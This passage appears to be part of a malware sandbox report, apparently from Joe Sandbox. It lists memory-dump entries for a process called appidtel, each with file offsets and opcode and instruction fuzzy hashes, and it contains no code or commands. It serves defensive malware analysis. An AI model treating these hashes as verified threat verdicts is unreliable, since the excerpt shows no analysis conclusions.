                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3dec1a074428ed0fea9e886467f5ddb50866f690b3befa9c0048105f00cc5a63
                                                      • Instruction ID: 0aacb6dec396c75d4ac089b81fea21abdb23653d8dd804d10bef3d5deb62b965
                                                      • Opcode Fuzzy Hash: 3dec1a074428ed0fea9e886467f5ddb50866f690b3befa9c0048105f00cc5a63
                                                      • Instruction Fuzzy Hash: 14F0A476A21348AFD704EBB9C505AEEF7B8EF44710F008066F601EB280DAB4DA018751
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca802fb4280fd6cf113daa5b67d440461527e4fc48ec9074353e3378cd85dd2b
                                                      • Instruction ID: 2db98ea9e0510aadc892943ae1645e5ea568ab0f1aadb16f5f86380ef0a75cd9
                                                      • Opcode Fuzzy Hash: ca802fb4280fd6cf113daa5b67d440461527e4fc48ec9074353e3378cd85dd2b
                                                      • Instruction Fuzzy Hash: 66018F75A112499BCB04EFA9D841AEEF7B8AF48310F14405AF901AB280D774EA02CB94
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                      • Instruction ID: efaf100416d029af812e619d7004cb34748b15ec61e9d06fa467e9a03fd52587
                                                      • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                      • Instruction Fuzzy Hash: DAF0F675A21356ABEB14EBAD8940FBABBA8BF80710F098595BD11AB140D670E9C0C754
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 759fdde6f3b0f70bda2d2464585262238c24a1a710640a333885b9578abf29bc
                                                      • Instruction ID: 48e27b9be213f437a4ae7c7e5bca468ae8cab4ed134d48ac7484c68d20039c71
                                                      • Opcode Fuzzy Hash: 759fdde6f3b0f70bda2d2464585262238c24a1a710640a333885b9578abf29bc
                                                      • Instruction Fuzzy Hash: 71011E74A113099FDB04EFA9D545B9EF7F4FF08300F148165A519EB381EA74DA408B91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b2a89f908b5626f0791960df90d44b6844a0980c78d6083400ac95963b4eed6
                                                      • Instruction ID: 46abd66d9f3c8564c41ec56dcc5d2afb26beba39449e7df9859db3315558a3c5
                                                      • Opcode Fuzzy Hash: 4b2a89f908b5626f0791960df90d44b6844a0980c78d6083400ac95963b4eed6
                                                      • Instruction Fuzzy Hash: C3F02BB13343156BF714D5198D01F2233D9E7D1A50F698066EA459F2C4EAB0DCC18394
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction ID: 100647fec44408c60c90d8636535f6bafc6de2b5ab19a4561f57e39cde07b191
                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                      • Instruction Fuzzy Hash: 52F04FB6940344BFE711EB68CD41FDAB7FCEB04710F100166BA16DA190EAB0AA44CB90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction ID: 42f0175e1af8af305da04aa834ce93966c4c6909d1349cd807dbf5e16515b404
                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction Fuzzy Hash: A4F0E939371A1347DB35FE2B8411B6EE355AF80900BF9052C9541CF640DFA0D9C087E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a8af6f705a4539f298f3ac2de8d6103ddf745f61f7320a7c8df97a3379bee2a
                                                      • Instruction ID: bd3db3730d44d902c025cd6a6c779cba15b0b64f615fb88f7ddebfab82d570f3
                                                      • Opcode Fuzzy Hash: 6a8af6f705a4539f298f3ac2de8d6103ddf745f61f7320a7c8df97a3379bee2a
                                                      • Instruction Fuzzy Hash: 17F04F75A11349AFCB04EFA9D545A9EB7F4EF08300F508069BA45EB381E6B4DA41CB54
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a920e7c6e34ee7a4da30298573dc710b6868a087270806fbd6e1d06a1b232539
                                                      • Instruction ID: 55f92aa384b54a13a7b4cb39bad93aaa4b4d3ec31bd4f21a407b931c17cdd841
                                                      • Opcode Fuzzy Hash: a920e7c6e34ee7a4da30298573dc710b6868a087270806fbd6e1d06a1b232539
                                                      • Instruction Fuzzy Hash: 4BF0FAB2210340AFC731EB09CC04FAABBEDEF86B00F080118E942930A0C7E0A988C660
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35b072ad429d54fa46b3b4adb393156429db3cf634c68a47d158193ec79f7b3a
                                                      • Instruction ID: d577a5a3305f706dac94342fd6bdb51ea5fda94e9b3bf326522cc716195e52e0
                                                      • Opcode Fuzzy Hash: 35b072ad429d54fa46b3b4adb393156429db3cf634c68a47d158193ec79f7b3a
                                                      • Instruction Fuzzy Hash: 37F024318323D28FD739EB5AE844B21B7D89B00628F0C48AAD88987901C3B1D8C0C610
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0aecff7441ccd44fbdfd20056b0048e4e5c6865ceee136d46c31bf66d7c4602
                                                      • Instruction ID: c5e407cb8431bf74445a5b2994a7e2df56cd8a5d1bf5e0b6987953ca6445c0ed
                                                      • Opcode Fuzzy Hash: b0aecff7441ccd44fbdfd20056b0048e4e5c6865ceee136d46c31bf66d7c4602
                                                      • Instruction Fuzzy Hash: 69F0272E429B806ECB29EB28ACF1392AB6D9742220F0E50D5C4A55B248C6B88483C220
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b2d4bae5e6ad44f889bfbc7c23329822ac0c87ebc34d2fd72d89e2b654c010e
                                                      • Instruction ID: 4dcec7f48cd68ac71cdf01f330c3745624893b60057c514b5aa3fef7d4848e52
                                                      • Opcode Fuzzy Hash: 5b2d4bae5e6ad44f889bfbc7c23329822ac0c87ebc34d2fd72d89e2b654c010e
                                                      • Instruction Fuzzy Hash: 1FF05474A1134C9FD704EBB9D545B9DB7B8AF44704F548455F501EB281DAB4D9018B14
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5901ccb79d16c92ce0ab922d1470510d65e65df8a218dd4334932bad5fb25c9c
                                                      • Instruction ID: e0b8d81eab183da939425f4df76ea59b787ea69bcc30eb507c28979347e539b6
                                                      • Opcode Fuzzy Hash: 5901ccb79d16c92ce0ab922d1470510d65e65df8a218dd4334932bad5fb25c9c
                                                      • Instruction Fuzzy Hash: 6DF0BE78A21308ABDB08EBA9D941AAEB3B8BF44300F044458B941EB2C1EA74D9018B54
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbc9a197c974dd6afd2b1ef8cd6481f3881f8e4331f680524885cdb559689e9d
                                                      • Instruction ID: 862c95f44d11310e607f0a9a4db62e2ef028554661fdf8f7d3095d719efd828f
                                                      • Opcode Fuzzy Hash: dbc9a197c974dd6afd2b1ef8cd6481f3881f8e4331f680524885cdb559689e9d
                                                      • Instruction Fuzzy Hash: C4F0B478A203489BD704EFB5D541F6EB3B8AF44304F044458B501EB2C0EAB4D900CB14
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: 54f5b23591c38bdc4702a1ff7477596f1f4f75f64b2b582c53b3ba91edcdf458
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: 7FE092723517406BD712EF59CC80F57776E9F82B10F140479BA045E292CAE29D4982A4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b08de758a648690470c575c615f33f8bb712db338d538c91aa8ab08281d371a
                                                      • Instruction ID: a7178c80b5dbbad53b17e3c4dd9c5eae6dcbe65a9e773bd87d708ad2458a9682
                                                      • Opcode Fuzzy Hash: 4b08de758a648690470c575c615f33f8bb712db338d538c91aa8ab08281d371a
                                                      • Instruction Fuzzy Hash: 73F02774A11308ABDB04EBB9D885E9EB7B8EF49304F140458F502EB2D0EAB4D9008B14
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 470163cb16257db845c5cea4913c20ed3e8b9b6b39c5331f2a9808cb44bfa080
                                                      • Instruction ID: 0742e0cab2ad177165dfe200a1252b70e1441a670f3d0b381ed93571e11e650d
                                                      • Opcode Fuzzy Hash: 470163cb16257db845c5cea4913c20ed3e8b9b6b39c5331f2a9808cb44bfa080
                                                      • Instruction Fuzzy Hash: 34F08275A25349ABDB04FBA9D945EAEB3B8AF44704F144058BA01EB2C1EAB4D9018758
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: deb83cf395a3b180fc5a28f4c0cf9d60c57316855984ab7f0fd17a931cb4ac64
                                                      • Instruction ID: 702c1f6c6734829f6ce76929698818d3f01df7086c2b8c36417629ac7be5ad71
                                                      • Opcode Fuzzy Hash: deb83cf395a3b180fc5a28f4c0cf9d60c57316855984ab7f0fd17a931cb4ac64
                                                      • Instruction Fuzzy Hash: 1CF08C71931A969FD722E71EC1C4BA2B7F89B10BB0F4D85A1E8199B512CB78DCD0C361
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5ad0ac7721fec0f94ab4f1d706c199ad68e74a2c1ab965327427849dc0ebc5f
                                                      • Instruction ID: e7046e6e4cca7662bcffb577ce66477879397a7371162e5d2228c5a4c63bed0d
                                                      • Opcode Fuzzy Hash: d5ad0ac7721fec0f94ab4f1d706c199ad68e74a2c1ab965327427849dc0ebc5f
                                                      • Instruction Fuzzy Hash: 15F08275A21249ABDB04EBA9D946E6EB3B8AF44704F140059BA01EB2C0EAB4D901C758
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                      • Instruction ID: daea3ecb2a76ca56026b46d7a171a7d9060114a29f27abd135fa2ed9c8299f8e
                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                      • Instruction Fuzzy Hash: 5DF0E53361571467C230EA0D8C05F9BFBACDBD5B70F10472ABA249B1D0DAB0AA41C7D6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b28c0bd95f2a4040c670777194eafd0ea6e1de322bc0c998955317cbcd1318d
                                                      • Instruction ID: 0d9921df06226be2b0a8cd6a348231fb6b99c4799dd5597e05571d7ca2825a3f
                                                      • Opcode Fuzzy Hash: 0b28c0bd95f2a4040c670777194eafd0ea6e1de322bc0c998955317cbcd1318d
                                                      • Instruction Fuzzy Hash: A3F08279A21349AFDB04EBA9D556E9EB7B8EF08704F040064F602EB2C0E9B4D9418B18
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: b6835c921541e2506b5b3e0fc0b09cef3e0e4f5f4dc0258885ba9c795c5d3459
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: 46F0E53D2243459FEB19DF15C150A95BBA8FB41350B054095FE428B300D7B1E9C1CB41
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction ID: c10818f315344ed09f7abc9ce46feea8b6876479b063ef65ad8d573050df2e5c
                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction Fuzzy Hash: 7AE06D76220200AFE768EB58CD45FA673ECEB00761F140258B525970D0DAB0AE80CA60
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction ID: 6d1d9247c7e0ab7e916e79ca46c0dd4fd6c6659392ffa66dbaac6e2549159e73
                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction Fuzzy Hash: 72E0C2343603468FD71ADF1AC050B63B7B6BFD5A10F28C168A8488F205EB32E882CB40
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                      • Instruction ID: c78955ec186b48608a721fbe93795c5da6510666574db981a67a4e069ae47589
                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                      • Instruction Fuzzy Hash: 8FE0C2352A4614BBDB22AA40CC00F69BB19DB40BE1F104032FB086E690C6B1ADD1D6D4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction ID: f56360a63f41edcc0e7965797efd3884751b4883a25615a5b6cf4a204851f110
                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction Fuzzy Hash: 84E08C3523AB50EFDB31EF25DC00B5176A9FB45B50F25486AF0810E4A486F4ACC5CA44
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58fe1a8f223424e470cae15d2fcd4205f5e8a1919c0b5bfb84225b47c2d308b1
                                                      • Instruction ID: c05e40382e2f26eee9f8825ea0101b2e2b70ec5f69f12e7033407514015a0874
                                                      • Opcode Fuzzy Hash: 58fe1a8f223424e470cae15d2fcd4205f5e8a1919c0b5bfb84225b47c2d308b1
                                                      • Instruction Fuzzy Hash: 54F0C234661B80CBE61ADF08C1E1B6173B9FB45B40F504598D8868BBA1C73AA982CB80
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35ae64787a7d5645f17c9fc083f68bc198b735da41f8e72fcefca8bd868ba7a5
                                                      • Instruction ID: bc7877da5646db5a8c54bc73cdc039795ea7d24bc78d7aee06293da3917d9eed
                                                      • Opcode Fuzzy Hash: 35ae64787a7d5645f17c9fc083f68bc198b735da41f8e72fcefca8bd868ba7a5
                                                      • Instruction Fuzzy Hash: 3EE0C236210650ABC316FF5EDD41F4A739EEF943A0F004221F1518F290CAB0ED80C7A4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: e293e3b80d47c19abfaeac9dae60db48cb768142e268bf2aa53292195e069d01
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 47D0223233203093CB28D6506800FA3AA059B82A90F0A003C780AA3800C0148CC2C2E0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                      • Instruction ID: fbae05d052c6523c307667d705ebebb90290f4becc6bd71a73ddb2c17102e9c0
                                                      • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                      • Instruction Fuzzy Hash: 71D01735961AC4CFE727CB08C165B507BF8F705B40F890098E04247AA2C37C99C4CB00
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: ee83aa7e96e0cf8aaa8bc269a119c6e91aed58b4ead052c6cd9acf04d5139574
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: F1C08C3B2A0748AFC712EF98CD01F027BA9EB98B80F000021F7048B670C671FD60EA84
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction ID: 5cfa36551a495874839167fd575a7fcb115136590fb2e5358841a65c9212aed7
                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction Fuzzy Hash: 27D01236110288EFCB05DF41C890D9A772AFFC8710F108019FD190B6108A71EDA2DA50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: 35beee62151483242a14e9ad54c752891c9ade297570f719fe501329126e05e3
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: F7C04C797116418FDF15DB19D294F4577F4F744740F1518D0F945CB721E664E941CA10
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8abed1d3784c70213ece2139e93cea4fd495e95e8f48dca85d3c6f95c15d7f0b
                                                      • Instruction ID: a9254e151fb761f647c9c207fc1f42db8ca310c73bfd832ea3f6ef0b7bc01227
                                                      • Opcode Fuzzy Hash: 8abed1d3784c70213ece2139e93cea4fd495e95e8f48dca85d3c6f95c15d7f0b
                                                      • Instruction Fuzzy Hash: FB90023161580412A540B1584884546400597E1301B59C012E1428554C8B148A965365
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 183b334aee2c2e01bae27a6754d88b85996db39a7468766cd4e4527fbcded919
                                                      • Instruction ID: 8e2b675667b254a8cbc498800933f79f1239ee37791fa478ce49e0c56ec7d699
                                                      • Opcode Fuzzy Hash: 183b334aee2c2e01bae27a6754d88b85996db39a7468766cd4e4527fbcded919
                                                      • Instruction Fuzzy Hash: 3B90022121184842E540B2584804B0F410587E2202F99C01AA515A554CCA1589955725
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0238df107d50e42becac7428cdf368bf1016a7b094f756006c281c03cd1558e7
                                                      • Instruction ID: 49352199676b5541ac2416ede2e70693d090fd881204f1c30d9ad33849b40c14
                                                      • Opcode Fuzzy Hash: 0238df107d50e42becac7428cdf368bf1016a7b094f756006c281c03cd1558e7
                                                      • Instruction Fuzzy Hash: 3590022125140C02E540B15884147070006C7D1601F59C012A1028554D87168AA566B5
                                                      Memory Dump Source
